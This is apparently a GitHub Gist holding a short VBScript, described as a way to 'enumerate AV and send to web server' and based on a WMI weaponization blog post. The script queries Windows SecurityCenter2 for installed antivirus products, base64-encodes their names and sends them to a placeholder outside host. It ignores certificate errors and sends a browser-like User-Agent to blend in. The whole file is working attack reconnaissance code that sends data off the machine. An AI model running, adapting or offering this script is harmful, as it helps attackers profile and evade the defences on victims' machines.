-
-
Save sasqwatch/09a5813bcbe39bb4c5a30a98f78f393d to your computer and use it in GitHub Desktop.
Enumerate AV and send to web server (based on https://blog.netspi.com/getting-started-wmi-weaponization-part-2/)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function Base64Encode(sText) | |
| dim DM, EL | |
| Set DM = CreateObject("Microsoft.XMLDOM") | |
| Set EL = DM.createElement("tmp") | |
| EL.DataType = "bin.base64" | |
| EL.NodeTypedValue = sText | |
| Base64Encode = EL.Text | |
| End Function | |
| Set wmiObj=GetObject("winmgmts:{impersonationLevel=impersonate}\\.\ROOT\SecurityCenter2") | |
| Set items = wmiObj.ExecQuery("Select * from AntiVirusProduct") | |
| dim info,id | |
| info = "" | |
| For Each item in items | |
| info = info & item.displayName & "|" | |
| Next | |
| set a = CreateObject("System.Text.ASCIIEncoding") | |
| id = Base64Encode(a.GetBytes_4(info)) | |
| set wc = CreateObject("MSXML2.ServerXMLHTTP") | |
| wc.Open "GET", "https://HOSTNAME/?id=" & id, false | |
| wc.setOption 2, wc.getOption(2) - SXH_SERVER_CERT_IGNORE_ALL_SERVER_ERRORS | |
| wc.setRequestHeader "User-Agent", "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" | |
| wc.Send |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment